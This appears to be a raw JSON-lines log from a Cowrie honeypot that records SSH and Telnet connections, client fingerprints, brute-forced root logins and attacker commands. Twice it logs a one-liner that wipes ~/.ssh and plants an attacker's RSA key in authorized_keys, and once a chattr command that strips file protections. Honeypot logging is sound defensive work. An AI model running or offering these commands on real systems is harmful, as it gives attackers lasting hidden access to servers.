{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:58:53.981003Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.session.closed","duration":12.816219329833984,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.061735Z","src_ip":"122.194.9.203","session":"b699b06c0464"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":16412,"dst_ip":"1.2.3.4","dst_port":23,"session":"26ef82b0f9c7","protocol":"telnet","message":"New connection: 122.194.9.203:16412 (1.2.3.4:23) [session: 26ef82b0f9c7]","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.250233Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.268385Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.269535Z","src_ip":"212.227.235.229","session":"ae56cade4bf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38132,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ea6a1def60","protocol":"ssh","message":"New connection: 212.227.235.229:38132 (1.2.3.4:22) [session: 35ea6a1def60]","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.541227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.543082Z","src_ip":"212.227.235.229","session":"35ea6a1def60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:54.824289Z","src_ip":"212.227.235.229","session":"35ea6a1def60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:55.140036Z","src_ip":"212.227.235.229","session":"35ea6a1def60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38468,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d3d5c6085da","protocol":"ssh","message":"New connection: 212.227.235.229:38468 (1.2.3.4:22) [session: 2d3d5c6085da]","sensor":"my-vps","timestamp":"2025-09-09T04:58:55.362763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:58:55.363523Z","src_ip":"212.227.235.229","session":"2d3d5c6085da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:58:55.617170Z","src_ip":"212.227.235.229","session":"2d3d5c6085da"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:58:56.164703Z","src_ip":"212.227.235.229","session":"2d3d5c6085da"}
{"eventid":"cowrie.session.closed","duration":12.878001928329468,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:59:07.128163Z","src_ip":"122.194.9.203","session":"26ef82b0f9c7"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":3990,"dst_ip":"1.2.3.4","dst_port":23,"session":"31dfd9a60586","protocol":"telnet","message":"New connection: 122.97.209.175:3990 (1.2.3.4:23) [session: 31dfd9a60586]","sensor":"my-vps","timestamp":"2025-09-09T04:59:07.312092Z"}
{"eventid":"cowrie.session.closed","duration":12.77003026008606,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:59:20.082048Z","src_ip":"122.97.209.175","session":"31dfd9a60586"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":17608,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f71310d6f1e","protocol":"telnet","message":"New connection: 122.97.209.175:17608 (1.2.3.4:23) [session: 9f71310d6f1e]","sensor":"my-vps","timestamp":"2025-09-09T04:59:20.246619Z"}
{"eventid":"cowrie.session.closed","duration":12.823163509368896,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:59:33.069708Z","src_ip":"122.97.209.175","session":"9f71310d6f1e"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":27334,"dst_ip":"1.2.3.4","dst_port":23,"session":"379e6c827628","protocol":"telnet","message":"New connection: 122.194.9.203:27334 (1.2.3.4:23) [session: 379e6c827628]","sensor":"my-vps","timestamp":"2025-09-09T04:59:33.355425Z"}
{"eventid":"cowrie.session.closed","duration":12.75637149810791,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:59:46.111690Z","src_ip":"122.194.9.203","session":"379e6c827628"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":26260,"dst_ip":"1.2.3.4","dst_port":23,"session":"0263784c7120","protocol":"telnet","message":"New connection: 122.97.209.175:26260 (1.2.3.4:23) [session: 0263784c7120]","sensor":"my-vps","timestamp":"2025-09-09T04:59:46.245300Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43408,"dst_ip":"1.2.3.4","dst_port":23,"session":"87662f48c078","protocol":"telnet","message":"New connection: 212.227.235.229:43408 (1.2.3.4:23) [session: 87662f48c078]","sensor":"my-vps","timestamp":"2025-09-09T04:59:58.267870Z"}
{"eventid":"cowrie.session.closed","duration":12.828134059906006,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:59:59.072375Z","src_ip":"122.97.209.175","session":"0263784c7120"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":17018,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc358df05b59","protocol":"telnet","message":"New connection: 122.97.209.175:17018 (1.2.3.4:23) [session: fc358df05b59]","sensor":"my-vps","timestamp":"2025-09-09T04:59:59.264887Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":50534,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f4db09677ae","protocol":"ssh","message":"New connection: 14.103.112.104:50534 (1.2.3.4:22) [session: 4f4db09677ae]","sensor":"my-vps","timestamp":"2025-09-09T05:00:00.206321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:00:00.207639Z","src_ip":"14.103.112.104","session":"4f4db09677ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:00:01.019397Z","src_ip":"14.103.112.104","session":"4f4db09677ae"}
{"eventid":"cowrie.session.closed","duration":12.838070392608643,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:12.102890Z","src_ip":"122.97.209.175","session":"fc358df05b59"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":18546,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7dc1d91ea2c","protocol":"telnet","message":"New connection: 122.194.9.203:18546 (1.2.3.4:23) [session: e7dc1d91ea2c]","sensor":"my-vps","timestamp":"2025-09-09T05:00:12.264012Z"}
{"eventid":"cowrie.session.closed","duration":12.83144497871399,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:25.095358Z","src_ip":"122.194.9.203","session":"e7dc1d91ea2c"}
{"eventid":"cowrie.session.connect","src_ip":"122.194.9.203","src_port":12768,"dst_ip":"1.2.3.4","dst_port":23,"session":"eaf55037ebbe","protocol":"telnet","message":"New connection: 122.194.9.203:12768 (1.2.3.4:23) [session: eaf55037ebbe]","sensor":"my-vps","timestamp":"2025-09-09T05:00:25.266100Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.141.132.26","src_port":48794,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8577b5f9ba6","protocol":"ssh","message":"New connection: 185.141.132.26:48794 (1.2.3.4:22) [session: b8577b5f9ba6]","sensor":"my-vps","timestamp":"2025-09-09T05:00:33.586318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:00:33.587304Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.closed","duration":35.321584701538086,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:33.589377Z","src_ip":"212.227.235.229","session":"87662f48c078"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:00:33.677018Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner-as12#","message":"login attempt [root/hetzner-as12#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.076690Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:00:34.307650Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.308338Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.309515Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.399616Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:00:34.594843Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.595540Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.686656Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.687517Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.connect","src_ip":"185.141.132.26","src_port":48802,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e3964ac088","protocol":"ssh","message":"New connection: 185.141.132.26:48802 (1.2.3.4:22) [session: d3e3964ac088]","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.779825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.780783Z","src_ip":"185.141.132.26","session":"d3e3964ac088"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:00:34.865390Z","src_ip":"185.141.132.26","session":"d3e3964ac088"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:00:35.247984Z","src_ip":"185.141.132.26","session":"d3e3964ac088"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:36.335352Z","src_ip":"185.141.132.26","session":"d3e3964ac088"}
{"eventid":"cowrie.session.connect","src_ip":"185.141.132.26","src_port":48818,"dst_ip":"1.2.3.4","dst_port":22,"session":"e815e14e82c3","protocol":"ssh","message":"New connection: 185.141.132.26:48818 (1.2.3.4:22) [session: e815e14e82c3]","sensor":"my-vps","timestamp":"2025-09-09T05:00:36.448634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:00:36.449685Z","src_ip":"185.141.132.26","session":"e815e14e82c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:00:36.551582Z","src_ip":"185.141.132.26","session":"e815e14e82c3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:00:37.004129Z","src_ip":"185.141.132.26","session":"e815e14e82c3"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:37.095280Z","src_ip":"185.141.132.26","session":"b8577b5f9ba6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:37.106945Z","src_ip":"185.141.132.26","session":"e815e14e82c3"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55376,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a2a718e016","protocol":"ssh","message":"New connection: 217.72.205.35:55376 (1.2.3.4:22) [session: e7a2a718e016]","sensor":"my-vps","timestamp":"2025-09-09T05:00:37.425658Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:37.427377Z","src_ip":"217.72.205.35","session":"e7a2a718e016"}
{"eventid":"cowrie.session.closed","duration":12.842970609664917,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:00:38.109002Z","src_ip":"122.194.9.203","session":"eaf55037ebbe"}
{"eventid":"cowrie.session.connect","src_ip":"122.97.209.175","src_port":5050,"dst_ip":"1.2.3.4","dst_port":23,"session":"af2d696254ff","protocol":"telnet","message":"New connection: 122.97.209.175:5050 (1.2.3.4:23) [session: af2d696254ff]","sensor":"my-vps","timestamp":"2025-09-09T05:00:38.306794Z"}
